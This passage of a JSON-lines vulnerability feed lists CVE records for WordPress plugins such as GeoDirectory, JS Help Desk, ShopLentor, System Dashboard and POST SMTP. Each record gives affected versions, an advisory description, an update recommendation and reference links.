]}]"}
{"CVE_ID":"CVE-2024-13506","slug":"geodirectory","versionImpact":"2.8.97","versionEndExcluding":"2.8.98","description":"The GeoDirectory \u2013 WP Business Directory Plugin and Classified Listings Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the display_name profile parameter in all versions up to, and including, 2.8.97 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.98, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/admin\\\/class-geodir-admin-post-view.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/geodirectory\\\/tags\\\/2.8.97\\\/includes\\\/admin\\\/class-geodir-admin-post-view.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225839\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0d9ba14-c0c9-426e-927e-9139a0882f0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0d9ba14-c0c9-426e-927e-9139a0882f0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13606","slug":"js-support-ticket","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The JS Help Desk \u2013 The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.8 via the 'jssupportticketdata' directory. This makes it possible for unauthenticated attackers to extract sensitive data stored insecurely in the \/wp-content\/uploads\/jssupportticketdata directory which can contain file attachments included in support tickets.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/includes\\\/classes\\\/uploads.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/includes\\\/classes\\\/uploads.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8ed5d5d-86b0-40ac-a093-31392dea13a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8ed5d5d-86b0-40ac-a093-31392dea13a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4566","slug":"woolentor-addons","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The ShopLentor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_dismiss function in all versions up to, and including, 2.8.8. This makes it possible for authenticated attackers, with contributor-level access and above, to set arbitrary WordPress options to \"true\". NOTE: This vulnerability can be exploited by attackers with subscriber- or customer-level access and above if (1) the WooCommerce plugin is deactivated or (2) access to the default WordPress admin dashboard is explicitly enabled for authenticated users.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6aaabe9-4f55-4c01-b350-573e6a944353?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6aaabe9-4f55-4c01-b350-573e6a944353?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php#L52\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php#L52\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/admin\\\/include\\\/class.notice.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3345","slug":"woolentor-addons","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The ShopLentor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's woolentorsearch shortcode in all versions up to, and including, 2.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a73a7f-53ac-4930-a1cd-c39818f64678?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6a73a7f-53ac-4930-a1cd-c39818f64678?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.3\\\/includes\\\/modules\\\/ajax-search\\\/base.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.8.3\\\/includes\\\/modules\\\/ajax-search\\\/base.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/ajax-search\\\/base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3088881\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/ajax-search\\\/base.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13607","slug":"js-support-ticket","versionImpact":"2.8.8","versionEndExcluding":"2.8.9","description":"The JS Help Desk \u2013 The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.8.8 via the 'exportusereraserequest' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level permissions and above, to export ticket data for any user.","recommendation":"Update to version 2.8.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/modules\\\/gdpr\\\/controller.php#L110\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.8\\\/modules\\\/gdpr\\\/controller.php#L110\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230977\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230977\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f57fbbc-ed5a-4452-bd8a-6fc0a4536d76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f57fbbc-ed5a-4452-bd8a-6fc0a4536d76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3861","slug":"prevent-direct-access","versionImpact":"2.8.8.2","versionEndExcluding":"2.8.8.3","description":"The Prevent Direct Access \u2013 Protect WordPress Files plugin for WordPress is vulnerable to unauthorized access and modification of data due to a misconfigured capability check on the 'pda_lite_custom_permission_check' function in versions 2.8.6 to 2.8.8.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to access and change the protection status of media.","recommendation":"Update to version 2.8.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/tags\\\/2.8.8.2\\\/includes\\\/pda_lite_api.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/tags\\\/2.8.8.2\\\/includes\\\/pda_lite_api.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279923\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3279923\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed83916-3cf7-4fc6-a16f-45b40cedc721?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed83916-3cf7-4fc6-a16f-45b40cedc721?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3923","slug":"prevent-direct-access","versionImpact":"2.8.8","versionEndExcluding":"2.8.8.1","description":"The Prevent Direct Access \u2013 Protect WordPress Files plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.8.8 via the 'generate_unique_string' due to insufficient randomness of the generated file name. This makes it possible for unauthenticated attackers to extract sensitive data including files protected by the plugin if the attacker can determine the file name.","recommendation":"Update to version 2.8.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/prevent-direct-access\\\/tags\\\/2.8.8\\\/includes\\\/helper.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/prevent-direct-access\\\/tags\\\/2.8.8\\\/includes\\\/helper.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/trunk\\\/includes\\\/helper.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/prevent-direct-access\\\/trunk\\\/includes\\\/helper.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648a9ca-a72f-418e-bf1b-ad4ecc27d365?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f648a9ca-a72f-418e-bf1b-ad4ecc27d365?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6327","slug":"woolentor-addons","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The ShopLentor (formerly WooLentor) plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the purchased_new_products function in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to view all products purchased in the past week, along with the users that purchased them.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php?contextall=1&old=3061864&old_path=%2Fwoolentor-addons%2Ftrunk%2Fincludes%2Fmodules%2Fsales-notification%2Fclass.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php?contextall=1&old=3061864&old_path=%2Fwoolentor-addons%2Ftrunk%2Fincludes%2Fmodules%2Fsales-notification%2Fclass.sale_notification.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.7.4\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolentor-addons\\\/tags\\\/2.7.4\\\/includes\\\/modules\\\/sales-notification\\\/class.sale_notification.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263324cb-31b7-40ad-ad7d-4582e128cd75?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263324cb-31b7-40ad-ad7d-4582e128cd75?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5714","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_db_specs() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve data key specs.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b3ac83-847d-4bd0-a79b-531af266e1b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53b3ac83-847d-4bd0-a79b-531af266e1b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L2942\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L2942\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L2949\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L2949\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3991","slug":"woolentor-addons","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +12 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _id attribute in the Horizontal Product Filter in all versions up to, and including, 2.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/563d44cd-5f5a-4914-8312-c554085b0821?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/563d44cd-5f5a-4914-8312-c554085b0821?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080097\\\/woolentor-addons\\\/trunk\\\/includes\\\/addons\\\/wl_product_horizontal_filter.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5713","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_option_value() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve potentially sensitive option values, and deserialize the content of those values.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9d1a33b-2518-48f7-90b6-a94a34473d1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9d1a33b-2518-48f7-90b6-a94a34473d1e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L6341\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L6341\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L6357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L6357\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5712","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_global_value() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive global value information.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f14d9d-6ed6-4bcb-944d-f9c5aa6a17a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70f14d9d-6ed6-4bcb-944d-f9c5aa6a17a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7382\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7382\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7403\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7403\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5711","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_php_info() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information provided by PHP info.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17bc3a9f-2bf9-44e3-81ef-bfa932085da9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17bc3a9f-2bf9-44e3-81ef-bfa932085da9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L1925\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L1925\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L1932\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L1932\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5710","slug":"system-dashboard","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The System Dashboard plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the sd_constants() function hooked via an AJAX action in all versions up to, and including, 2.8.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive information such as database credentials.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f170379e-e833-42e0-96fd-1e1722a8331c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f170379e-e833-42e0-96fd-1e1722a8331c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7930\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.7\\\/admin\\\/class-system-dashboard-admin.php#L7930\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7951\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.8\\\/admin\\\/class-system-dashboard-admin.php#L7951\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4281","slug":"aryo-activity-log","versionEndExcluding":"2.8.8","description":"This Activity Log WordPress plugin before 2.8.8 retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5ea6c8a-6b07-4263-a1be-dd033f078d49\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f5ea6c8a-6b07-4263-a1be-dd033f078d49\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6875","slug":"post-smtp","versionImpact":"2.8.7","versionEndExcluding":"2.8.8","description":"The POST SMTP Mailer \u2013 Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.","recommendation":"Update to version 2.8.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e675d64c-cbb8-4f24-9b6f-2597a97b49af?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-smtp\\\/trunk\\\/Postman\\\/Mobile\\\/includes\\\/rest-api\\\/v1\\\/rest-api.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016051\\\/post-smtp\\\/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3016051\\\/post-smtp\\\/trunk?contextall=1&old=3012318&old_path=%2Fpost-smtp%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6620","slug":"post-smtp","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The POST SMTP Mailer WordPress plugin before 2.8.7 does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high privilege users such as admin.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5c42ca-ee7d-4344-bd88-0d727ed3d9c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ab5c42ca-ee7d-4344-bd88-0d727ed3d9c4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7094","slug":"js-support-ticket","versionImpact":"2.8.6","versionEndExcluding":"2.8.7","description":"The JS Help Desk \u2013 The Ultimate Help Desk & Support Plugin plugin for WordPress is vulnerable to PHP Code Injection leading to Remote Code Execution in all versions up to, and including, 2.8.6 via the 'storeTheme' function. This is due to a lack of sanitization on user-supplied values, which replace values in the style.php file, along with missing capability checks. This makes it possible for unauthenticated attackers to execute code on the server. This issue was partially patched in 2.8.6 when the code injection issue was resolved, and fully patched in 2.8.7 when the missing authorization and cross-site request forgery protection was added.","recommendation":"Update to version 2.8.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31513f9e-6185-425b-9e7e-36f21f72d0a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31513f9e-6185-425b-9e7e-36f21f72d0a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/formhandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/formhandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/tpls\\\/admin_themes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/tpls\\\/admin_themes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/model.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/modules\\\/themes\\\/model.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/css\\\/style.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/js-support-ticket\\\/tags\\\/2.8.5\\\/includes\\\/css\\\/style.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51501","slug":"uncode-core","versionEndExcluding":"2.8.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Undsgn Uncode - Creative & WooCommerce WordPress Theme allows Reflected XSS. This issue affects Uncode - Creative & WooCommerce WordPress Theme: from n\/a through 2.8.6.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uncode-core\\\/wordpress-uncode-core-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uncode-core\\\/wordpress-uncode-core-plugin-2-8-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
